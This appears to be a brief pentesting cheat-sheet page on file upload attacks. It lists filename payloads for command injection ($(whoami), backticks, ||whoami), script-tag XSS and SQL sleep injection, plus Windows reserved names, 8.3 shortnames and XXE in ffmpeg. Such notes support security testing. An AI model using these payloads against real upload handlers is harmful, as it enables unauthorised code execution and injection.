search

Other Upload Attacks

hashtag
RCE in File Name

file$(whoami).jpg or file`whoami`.jpg or file.jpg||whoami

hashtag
XSS in File Name

<script>alert(window.origin);</script>.jpg

hashtag
SQL Injection in File Name

file';select+sleep(5);--.jpg

hashtag
Windows Specific Attacks

|, <, >, *, or ?

CON, COM1, LPT1, or NUL

8.3_filenamearrow-up-right -> Eto ata ung shortname sa IIS server

hashtag
Advance File Upload Attacks

things like xxe in ffmpeg

PreviousLimited File UploadsNextCommand Injection

Last updated